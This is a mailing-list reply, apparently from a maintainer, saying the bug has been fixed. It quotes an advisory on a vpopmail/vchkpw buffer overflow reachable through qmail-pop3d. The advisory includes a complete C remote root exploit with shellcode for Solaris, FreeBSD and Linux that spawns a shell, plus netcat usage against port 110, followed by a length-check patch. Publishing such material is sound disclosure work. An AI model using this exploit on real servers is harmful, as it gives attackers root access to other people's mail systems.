Re: Vpopmail (qmail add-on) is vulnerable to remote root exploit(vpopmail, vchkpw)

[iv0]

The exploitable code has been fixed since Jan 20th. 

Ken Jones

Irwan Hadi wrote:
> 
> What do you think ?
> 
>           Vpopmail (qmail add-on) is vulnerable to remote root exploit
> (vpopmail, vchkpw)
> ----------------------------------------------------------------------------
> ----
> 
> SUMMARY
> 
> When the vpopmail qmail add-on is installed and used to authenticate user
> information, a remote attacker may compromise the machine by supplying a
> long argument to qmail (which passes it to vpopmail). A remote attacker
> may obtain the privilege level of the authentication module - usually
> root.
> 
> DETAILS
> 
> Qmail-pop3d assumes that its password-check mechanism will support the
> long password that is passed to it. While according to the RFC 1939 (Post
> Office Protocol version 3) POP-3 passwords should be no longer than 40
> characters, qmail supports longer passwords, and therefore it's possible
> to pass vpopmail (a specific password verification mechanism) passwords
> which are longer than it expects - causing a buffer overflow.
> 
> Exploit:
> /*
>    qmail-qpop3d-vchkpw.c (v.3)
>    by: K2,
> 
>    The inter7 supported vchkpw/vpopmail package (replacement for
> chkeckpasswd)
>    has big problems ;)
> 
>    gcc -o vpop qmail-pop3d-vchkpw.c [-DBSD|-DSX86]
>    ( ./vpop [offset] [alignment] ; cat ) | nc target.com 110
> 
>    play with the alignment to get it to A) crash B) work.
>    qmail-pop3d/vchkpw remote exploit. (Sol/x86,linux/x86,Fbsd/x86) for
> now.
>    Tested agenst: linux-2.2.1[34], FreeBSD 3.[34]-RELEASE
>    vpopmail-3.4.10a/vpopmail-3.4.11[b-e]
> 
>    Hi plaguez.
>    prop's to Interrupt for testing with bsd, _eixon an others ;)
>    cheez shell's :)
>    THX goes out to STARBUCKS*!($#!
> */
> 
> #include <stdio.h>
> #include <stdlib.h>
> #include <string.h>
> 
> #define SIZE   260
> #define NOP    0x90
> #ifdef SX86
> #define DEFOFF 0x8047cfc
> #define NOPDEF 75
> #elif BSD
> #define DEFOFF 0xbfbfdbbf
> #define NOPDEF 81
> #else
> #define DEFOFF 0xbffffcd8
> #define NOPDEF 81
> #endif
> 
> char *shell =
> #ifdef SX86 // Solaris IA32 shellcode, cheez
> "\xeb\x48\x9a\xff\xff\xff\xff\x07\xff\xc3\x5e\x31\xc0\x89\x46\xb4"
> "\x88\x46\xb9\x88\x46\x07\x89\x46\x0c\x31\xc0\x50\xb0\x8d\xe8\xdf"
> "\xff\xff\xff\x83\xc4\x04\x31\xc0\x50\xb0\x17\xe8\xd2\xff\xff\xff"
> "\x83\xc4\x04\x31\xc0\x50\x8d\x5e\x08\x53\x8d\x1e\x89\x5e\x08\x53"
> "\xb0\x3b\xe8\xbb\xff\xff\xff\x83\xc4\x0c\xe8\xbb\xff\xff\xff\x2f"
> "\x62\x69\x6e\x2f\x73\x68\xff\xff\xff\xff\xff\xff\xff\xff\xff";
> #elif BSD // fBSD shellcode, [EMAIL PROTECTED]
> 
> "\xeb\x35\x5e\x59\x33\xc0\x89\x46\xf5\x83\xc8\x07\x66\x89\x46\xf9"
> "\x8d\x1e\x89\x5e\x0b\x33\xd2\x52\x89\x56\x07\x89\x56\x0f\x8d\x46"
> "\x0b\x50\x8d\x06\x50\xb8\x7b\x56\x34\x12\x35\x40\x56\x34\x12\x51"
> "\x9a>:)(:<\xe8\xc6\xff\xff\xff/bin/sh";
> #else // Linux shellcode, no idea
> "\xeb\x22\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x31\xc0\xaa"
> "\x89\xf9\x89\xf0\xab\x89\xfa\x31\xc0\xab\xb0\x08\x04"
> "\x03\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xd9\xff"
> "\xff\xff/bin/sh\xff";
> #endif
> 
> int main(int argc, char **argv)
> {
>    int i=0,esp=0,offset=0,nop=NOPDEF;
>    char buffer[SIZE];
> 
>    if (argc > 1) offset += strtol(argv[1], NULL, 0);
>    if (argc > 2) nop += strtol(argv[2], NULL, 0);
> 
>    esp = DEFOFF;
> 
>    memset(buffer, NOP, SIZE);
>    memcpy(buffer+nop, shell, strlen(shell));
>    for (i = (nop+strlen(shell)+1); i < SIZE; i += 4) {
>       *((int *) &buffer[i]) = esp+offset;
>    }
> 
>    printf("user %s\n",buffer);
>    printf("pass ADMR0X&*!(#&*(!\n");
> 
>    fprintf(stderr,"\nbuflen = %d, nops = %d, target =
> 0x%x\n\n",strlen(buffer),nop,esp+offset);
>    return(0);
> }
> 
> Patch:
> --- qmail-1.03/qmail-popup.c    Mon Jun 15 03:53:16 1998
> +++ qmail-1.03-patch/qmail-popup.c      Fri Jan 21 13:00:18 2000
> @@ -13,6 +13,8 @@
>  #include "readwrite.h"
>  #include "timeoutread.h"
>  #include "timeoutwrite.h"
> +#include <unistd.h>
> +#include <syslog.h>
> 
>  void die() { _exit(1); }
> 
> @@ -87,6 +89,24 @@
>    int child;
>    int wstat;
>    int pi[2];
> +
> +  /*
> +    This patch should have minimal impact of normal qmail operations.
> +    It was coded/tested under linux, but should work most everywhere.
> +  */
> +
> +  if(strlen(user) >= 40)
> +  {
> +     syslog(LOG_NOTICE,"excessive argument length [%d]",strlen(user));
> +     user[39]='\0';
> +     userlen=strlen(user);
> +  }
> +
> +  if(strlen(pass) >= 40)
> +  {
> +     syslog(LOG_NOTICE,"excessive argument length [%d]",strlen(pass));
> +     pass[39]='\0';
> +  }
> 
>    if (fd_copy(2,1) == -1) die_pipe();
>    close(3);
> 
> ADDITIONAL INFORMATION
> 
> No solution is currently available.
> 
> The information was provided by:  <mailto:[EMAIL PROTECTED]> K2.
> 
> ========================================
> 
> -------
> AFLHI 058009990407128029/089802---(102598//991024)